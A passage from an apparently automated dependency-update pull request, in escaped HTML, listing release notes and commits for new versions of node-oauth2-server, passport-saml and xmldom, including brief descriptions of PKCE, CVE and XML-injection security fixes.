href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/366\"\u003enode-oauth/node-oauth2-server#366\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/369\"\u003enode-oauth/node-oauth2-server#369\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.2 to 11.7.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/371\"\u003enode-oauth/node-oauth2-server#371\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.3 to 11.7.4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/372\"\u003enode-oauth/node-oauth2-server#372\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump github/codeql-action from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/373\"\u003enode-oauth/node-oauth2-server#373\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/374\"\u003enode-oauth/node-oauth2-server#374\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.4 to 11.7.5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/375\"\u003enode-oauth/node-oauth2-server#375\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump js-yaml from 3.14.1 to 3.14.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/380\"\u003enode-oauth/node-oauth2-server#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump glob from 10.4.5 to 10.5.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/381\"\u003enode-oauth/node-oauth2-server#381\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/382\"\u003enode-oauth/node-oauth2-server#382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump sinon from 21.0.0 to 21.0.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/385\"\u003enode-oauth/node-oauth2-server#385\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump chai from 4.5.0 to 6.2.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/386\"\u003enode-oauth/node-oauth2-server#386\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/upload-pages-artifact from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/392\"\u003enode-oauth/node-oauth2-server#392\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/393\"\u003enode-oauth/node-oauth2-server#393\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/configure-pages from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/394\"\u003enode-oauth/node-oauth2-server#394\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/395\"\u003enode-oauth/node-oauth2-server#395\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump lodash from 4.17.21 to 4.17.23 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/396\"\u003enode-oauth/node-oauth2-server#396\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump vitepress from 2.0.0-alpha.15 to 2.0.0-alpha.16 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/401\"\u003enode-oauth/node-oauth2-server#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump minimatch by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/407\"\u003enode-oauth/node-oauth2-server#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump rollup from 4.54.0 to 4.59.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/408\"\u003enode-oauth/node-oauth2-server#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump sinon from 21.0.1 to 21.0.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/413\"\u003enode-oauth/node-oauth2-server#413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump nyc from 17.1.0 to 18.0.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/406\"\u003enode-oauth/node-oauth2-server#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/configure-pages from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/420\"\u003enode-oauth/node-oauth2-server#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump handlebars from 4.7.8 to 4.7.9 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/419\"\u003enode-oauth/node-oauth2-server#419\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/compare/v5.2.1...v5.3.0\"\u003ehttps://github.com/node-oauth/node-oauth2-server/compare/v5.2.1...v5.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/cc70455a9496b184fd0caaadd79ba4b4002eb4c9\"\u003e\u003ccode\u003ecc70455\u003c/code\u003e\u003c/a\u003e fix(deps): update package-lock after bumping package version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/ef467c96b6db7b1a7f4177b54553e255e8cbfaae\"\u003e\u003ccode\u003eef467c9\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/8a35509617c70435dbae9386d40eeb148ff7a4aa\"\u003e\u003ccode\u003e8a35509\u003c/code\u003e\u003c/a\u003e publish 5.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/fe22982eeac064ccca0160925150c27378d5a38d\"\u003e\u003ccode\u003efe22982\u003c/code\u003e\u003c/a\u003e fix: always perform timing safe euqal check on PKCE challenge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/e2fcac475a1ee81b7e9aeff37f4a97ceda2811a8\"\u003e\u003ccode\u003ee2fcac4\u003c/code\u003e\u003c/a\u003e fix: cover thrown errors in PKCE tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/2d0659fc2a339d50444dc9415c51a2fc984c160f\"\u003e\u003ccode\u003e2d0659f\u003c/code\u003e\u003c/a\u003e fix: multiple PKCE vulnerabilities addressed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/79b7cf568a91acfe1dc9538eb0f9435287ecb3d3\"\u003e\u003ccode\u003e79b7cf5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/issues/419\"\u003e#419\u003c/a\u003e from node-oauth/dependabot/npm_and_yarn/handlebars-4.7.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/a9c602898304d9db493f1723c57c38c66a9e225a\"\u003e\u003ccode\u003ea9c6028\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/issues/420\"\u003e#420\u003c/a\u003e from node-oauth/dependabot/github_actions/actions/con...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/8b54e5bae4e69556a2b4e21dac9dcad311754be8\"\u003e\u003ccode\u003e8b54e5b\u003c/code\u003e\u003c/a\u003e build(deps): bump actions/configure-pages from 5 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/ba80c3bdab47bbc5c0d88119d7ce77c4e0d2404a\"\u003e\u003ccode\u003eba80c3b\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump handlebars from 4.7.8 to 4.7.9\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/compare/v5.1.0...v5.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@node-saml/passport-saml` from 4.0.4 to 5.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/node-saml/passport-saml/releases\"\u003e@​node-saml/passport-saml's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.0\u003c/h2\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRevert \u003ccode\u003erelease-it\u003c/code\u003e for Node@18 compatibility \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/962\"\u003e#962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate minor dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/961\"\u003e#961\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e📚 Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Sponsor information - Stytch \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/960\"\u003e#960\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e⚙️ Technical Tasks\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eLint \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/954\"\u003e#954\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.0.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate node-saml/xml-crypto to address CVE (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/953\"\u003e#953\u003c/a\u003e) (4486ac9)\u003c/li\u003e\n\u003cli\u003eLint (113412a)\u003c/li\u003e\n\u003cli\u003eUpdate README.md to reflect updated node-saml (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/945\"\u003e#945\u003c/a\u003e) (a9df549)\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/902\"\u003e#902\u003c/a\u003e) (a1f973f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.0.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate nested dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/898\"\u003e#898\u003c/a\u003e) (53d7a0d)\u003c/li\u003e\n\u003cli\u003eUpdate prettier (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/897\"\u003e#897\u003c/a\u003e) (b44b581)\u003c/li\u003e\n\u003cli\u003eUpdate major versions of dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/896\"\u003e#896\u003c/a\u003e) (65c74bd)\u003c/li\u003e\n\u003cli\u003eUpdate minor dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/895\"\u003e#895\u003c/a\u003e) (d7e7e6b)\u003c/li\u003e\n\u003cli\u003eUpdate to \u003ccode\u003e@​node-saml/node-saml\u003c/code\u003e v5 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/894\"\u003e#894\u003c/a\u003e) (fba0b16)\u003c/li\u003e\n\u003cli\u003eUpdate to Node 18 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/893\"\u003e#893\u003c/a\u003e) (fac7993)\u003c/li\u003e\n\u003cli\u003eFix circular references \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/879\"\u003e#879\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/880\"\u003e#880\u003c/a\u003e) (a06ff72)\u003c/li\u003e\n\u003cli\u003eStrategyOptionsCallback shouldn't have to pass all SAML options (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/838\"\u003e#838\u003c/a\u003e) (430d94e)\u003c/li\u003e\n\u003cli\u003eFix README to require correct module name (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/884\"\u003e#884\u003c/a\u003e) (eacbbbb)\u003c/li\u003e\n\u003cli\u003eUpdate README to point to \u003ccode\u003enode-saml\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/886\"\u003e#886\u003c/a\u003e) (30b1478)\u003c/li\u003e\n\u003cli\u003eAdjust type enforcement to remove warnings (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/889\"\u003e#889\u003c/a\u003e) (2389a5e)\u003c/li\u003e\n\u003cli\u003eUpdate \u003ccode\u003epackage.json\u003c/code\u003e script to mirror \u003ccode\u003enode-saml\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/888\"\u003e#888\u003c/a\u003e) (cf541a5)\u003c/li\u003e\n\u003cli\u003eRemove unused \u003ccode\u003eAuthorizeOptions\u003c/code\u003e type (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/887\"\u003e#887\u003c/a\u003e) (f574901)\u003c/li\u003e\n\u003cli\u003eClarify SLO support in \u003ccode\u003epassport-saml\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/862\"\u003e#862\u003c/a\u003e) (0e34bc8)\u003c/li\u003e\n\u003cli\u003eAdd bot to close stale issues (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/864\"\u003e#864\u003c/a\u003e) (96f49d2)\u003c/li\u003e\n\u003cli\u003eClean up types (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/813\"\u003e#813\u003c/a\u003e) (930082a)\u003c/li\u003e\n\u003cli\u003eRoll-up changelog entries for beta releases (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/867\"\u003e#867\u003c/a\u003e) (a14f25a)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/node-saml/passport-saml/blob/master/CHANGELOG.md\"\u003e@​node-saml/passport-saml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.1.0 (2025-07-24)\u003c/h2\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRevert \u003ccode\u003erelease-it\u003c/code\u003e for Node@18 compatibility \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/962\"\u003e#962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate minor dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/961\"\u003e#961\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e📚 Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Sponsor information - Stytch \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/960\"\u003e#960\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e⚙️ Technical Tasks\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eLint \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/954\"\u003e#954\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003ev5.0.1 (2025-03-14)\u003c/h2\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003cstrong\u003egithub_actions\u003c/strong\u003e] Bump github/codeql-action from 2 to 3 \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/902\"\u003e#902\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e🐛 Bug Fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003cstrong\u003esecurity\u003c/strong\u003e] Update node-saml/xml-crypto to address CVE \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/953\"\u003e#953\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e📚 Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate README.md to reflect updated node-saml \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/945\"\u003e#945\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003ev5.0.0 (2024-03-27)\u003c/h2\u003e\n\u003ch4\u003e💣 Major Changes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate major versions of dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/896\"\u003e#896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate to \u003ccode\u003e@​node-saml/node-saml\u003c/code\u003e v5 \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/894\"\u003e#894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate to Node 18 \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/893\"\u003e#893\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up types \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/813\"\u003e#813\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e🚀 Minor Changes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate minor dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/895\"\u003e#895\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate nested dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/898\"\u003e#898\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate prettier \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/897\"\u003e#897\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/9fcf3d2408438d2242cd26dece977cae9f79d333\"\u003e\u003ccode\u003e9fcf3d2\u003c/code\u003e\u003c/a\u003e Release 5.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/f4b30092d5f5dae1760ab924b0d741d3b2904e9f\"\u003e\u003ccode\u003ef4b3009\u003c/code\u003e\u003c/a\u003e Revert \u003ccode\u003erelease-it\u003c/code\u003e for Node@18 compatibility (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/962\"\u003e#962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/a9b1bd100cfd625556402154f3d9d3eab0c7bdb8\"\u003e\u003ccode\u003ea9b1bd1\u003c/code\u003e\u003c/a\u003e Update minor dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/961\"\u003e#961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/756d1732a3102a18ad24fb9e4ab42300e4cb9291\"\u003e\u003ccode\u003e756d173\u003c/code\u003e\u003c/a\u003e Update Sponsor information - Stytch (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/960\"\u003e#960\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/61783e29237cbde09c8dd2495ea26c8dd9551fd0\"\u003e\u003ccode\u003e61783e2\u003c/code\u003e\u003c/a\u003e Lint (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/954\"\u003e#954\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/100bd17eff3a3dd89cb8d29f0a9d4cbe8de21ca1\"\u003e\u003ccode\u003e100bd17\u003c/code\u003e\u003c/a\u003e Release 5.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/4486ac90f957114bb9578c5a88a52a6e23c84801\"\u003e\u003ccode\u003e4486ac9\u003c/code\u003e\u003c/a\u003e Update node-saml/xml-crypto to address CVE (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/953\"\u003e#953\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/113412a096486823d010f1f494df1bdf87f9cbf8\"\u003e\u003ccode\u003e113412a\u003c/code\u003e\u003c/a\u003e Lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/a9df5493b4ca3b1ba94a47e54df20276f26e6f82\"\u003e\u003ccode\u003ea9df549\u003c/code\u003e\u003c/a\u003e Update README.md to reflect updated node-saml (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/945\"\u003e#945\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/a1f973fb9c80af9bfdb93153b591855d15d3ffd8\"\u003e\u003ccode\u003ea1f973f\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/902\"\u003e#902\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/node-saml/passport-saml/compare/v4.0.4...v5.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@xmldom/xmldom` from 0.7.13 to 0.8.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e@​xmldom/xmldom's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. 